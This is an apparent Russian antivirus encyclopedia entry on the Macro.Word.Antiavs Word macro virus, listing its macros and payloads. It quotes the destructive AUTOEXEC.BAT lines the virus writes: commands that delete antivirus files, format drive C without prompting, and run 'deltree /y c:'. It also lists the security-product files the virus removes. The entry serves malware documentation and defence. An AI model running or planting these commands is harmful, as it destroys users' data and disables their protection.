Macro.Word.Antiavs


Зашифрованный китайский Word-макро-вирус. Содержит 9 макросов: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organizer. Заражают систему при открытии зараженного файла (AutoOpen). Заражает документы при их сохранении с другим именем (FileSaveAs). При вызове меню File/Template (макрос FileTemplate) вирус устанавливает пароль "AntiAVs" на текущий документ и выдает MessageBox:

WordBasic Err = 16 Not enough memory!

При вызове меню макросов Tools/Macro (макрос ToolsMacro) вирус стирает весь текст пользователя в текущем документе и добавляет в AUTOEXEC.BAT команды уничтожения файлов антивируса PC-CILLIN:

echo off attrib -h -r -s +a c:\pc-cil~1\*.* >nul del c:\pc-cil~1\*.dll >nul

После этого вирус стирает все файлы, связанные с антивирусами:

C:\PC-Cillin 95\Lpt$vpn.* C:\PC-Cillin 97\Lpt$vpn.* C:\Tsc\PC-Cillin 97\Lpt$vpn.* C:\Zlockav\Gsav.cas C:\VB7\Virus.txt C:\Program Files\Norton AntiVirus\Viruscan.dat C:\Program Files\Symantec\Symevnt.386 C:\Program Files\McAfee\VirusScan95\Scan.dat C:\Program Files\McAfee\VirusScan95\Mcscan32.dll C:\Program Files\McAfee\VirusScan\Scan.dat C:\Program Files\McAfee\VirusScan\Mcscan32.dll C:\Program Files\Command Software\F-PROT95\Sign.def C:\Program Files\Command Software\F-PROT95\Dvp.vxd C:\Program Files\AntiViral Toolkit Pro\Avp32.exe C:\Program Files\AntiViral Toolkit Pro\*.avc C:\Tbavw95\Tbavw95.vxd

В зависимости датчика случайных чисел записывает в AUTOEXEC.BAT строки:

@Echo off cls echo I have clean a huge virus: echo MS-WINDOWS echo for you. ^_^ echo --AntiAVs-- echo y|format c: /u /v:AAV >nul deltree /y c: >nul



Содержание раздела